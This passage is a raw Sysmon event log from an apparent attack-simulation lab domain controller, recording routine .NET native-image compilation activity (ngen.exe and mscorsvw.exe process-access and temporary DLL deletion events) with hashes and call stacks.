AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\U9Y12ANLF2\Microsoft.VisualBasic.Compatibility.ni.dll.auxMD5=6CDA167F01606CB575AABBF8D930A743,SHA256=321D6579B2A64F79BA6B5C63027BF8BDF7283E1C70E5EFF4D2810B0D8166EB49,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023113Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.214{4DB9351A-A279-60D3-7705-00000000CF01}4116NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\U9Y12ANLF2\Microsoft.VisualBasic.Compatibility.ni.dllMD5=D24B04926FE7F6DCF22C03D19D81ACDA,SHA256=24BA745CC2F67BE16DCA1DA448D974A2B671607DB2813D4E1550F215C3A187F7,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023112Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.168{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-7705-00000000CF01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023111Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.152{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-7705-00000000CF01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023110Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:05.152{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-7705-00000000CF01}4116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023109Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.152{4DB9351A-A279-60D3-7605-00000000CF01}5592NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\9PJC85LRRD\Microsoft.VisualBasic.Activities.Compiler.ni.dll.auxMD5=3A75FC6F030E23DB24076A596CC5E9D6,SHA256=5E3E94EAAAD36249B5E5CC704E75AE610874867ACC0211F1286A1538ABB83BCF,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023108Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.136{4DB9351A-A279-60D3-7605-00000000CF01}5592NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\9PJC85LRRD\Microsoft.VisualBasic.Activities.Compiler.ni.dllMD5=8BC582094416D50CF506AEA4DAAE9FFB,SHA256=5A9AF3BAA544F0CB6223D31454ED4D07400CDF25A2CA283EDB31364D79382379,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023107Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.089{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-7605-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023106Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.074{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-7605-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023105Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:05.074{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-7605-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023104Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.074{4DB9351A-A279-60D3-7505-00000000CF01}5608NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\B24I0ERW2E\Microsoft.UpdateServices.SMPlugin.ni.dll.auxMD5=35D8DCF676786E976EB9D8C7D06C7C8B,SHA256=EF7948E7E90D1178643DE89281DF4D2EABF29CC4BBCCBC46362AB04AF77237A0,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023103Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.074{4DB9351A-A279-60D3-7505-00000000CF01}5608NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\B24I0ERW2E\Microsoft.UpdateServices.SMPlugin.ni.dllMD5=63E6B1D8F8F31AEDD8FC2D314135A185,SHA256=67936EBD051200CCB67490A13458DAF0C302E108B4ADED5329D538F08D523FCA,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023102Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.042{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A279-60D3-7505-00000000CF01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023101Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.027{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A279-60D3-7505-00000000CF01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023100Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:05.027{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A279-60D3-7505-00000000CF01}5608C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023099Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.027{4DB9351A-A278-60D3-7405-00000000CF01}3980NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DFJW59PZRN\Microsoft.Transactions.Bridge.Dtc.ni.dll.auxMD5=2AF9E66B474643A9E375545A152536D8,SHA256=220854FCB1AFCACF67D72FF93115546EDFDE8085BB33410CB96ECC5C7CA7F17A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023098Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:05.027{4DB9351A-A278-60D3-7405-00000000CF01}3980NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DFJW59PZRN\Microsoft.Transactions.Bridge.Dtc.ni.dllMD5=E085A8BAF6E4C8CCB8E514753420E404,SHA256=A854D51938433D798C1DE6CFBCDA7C12AFE1C8AB97681463B3A3C30DF0E26724,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023097Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:04.996{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A278-60D3-7405-00000000CF01}3980C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023221Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.996{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27A-60D3-8C05-00000000CF01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023220Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:06.996{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27A-60D3-8C05-00000000CF01}6080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023219Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.980{4DB9351A-A27A-60D3-8B05-00000000CF01}3604NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RJOZJEHMIE\Microsoft.Windows.ServerManager.Activities.ni.dll.auxMD5=AA39F5502D3C4C2B06BC0DD83C8D2AD5,SHA256=DB87C98AC9A71D15421DF4978A941B8B99AC20498A7F590DD9AF1CB8625E79D1,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023218Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.980{4DB9351A-A27A-60D3-8B05-00000000CF01}3604NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RJOZJEHMIE\Microsoft.Windows.ServerManager.Activities.ni.dllMD5=A002BB086FCA0F268FA55AD53A3DD811,SHA256=8AB454737585551E47EBBB10536FC52BD9E44E2C0CF95A6E70D6443EA528EC5D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023217Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.980{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=561A564BB5E95838AE05629087FD41BA,SHA256=FD1DCC1A21829C3FA1A6F00FB68D8F877895E5DFB2C6E0F8407CA70DCCA7E84E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023216Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.949{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27A-60D3-8B05-00000000CF01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023215Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.918{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A27A-60D3-8B05-00000000CF01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023214Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.918{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27A-60D3-8B05-00000000CF01}3604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023213Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.918{4DB9351A-A27A-60D3-8A05-00000000CF01}6864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PXTXKM3EZI\Microsoft.Windows.HostGuardianService.Plugin.ni.dll.auxMD5=9A6C3F69D11E73268AA552ABD84F17D4,SHA256=7EB2E85FC40DB4E1739FFAC27F43F2C3409AC19CE3DE46EF6991A56B09FCC4FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023212Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.918{4DB9351A-A27A-60D3-8A05-00000000CF01}6864NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PXTXKM3EZI\Microsoft.Windows.HostGuardianService.Plugin.ni.dllMD5=7BFDB7B3DB0D1F7381DBA4DDD7F2BB23,SHA256=F8ADA264A98206E161A8D2753403342465EC1D68B3F6D73DF35F15C1A270915C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023211Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.886{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A27A-60D3-8A05-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000023210Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.855{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A27A-60D3-8A05-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023209Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:06.855{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A27A-60D3-8A05-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\M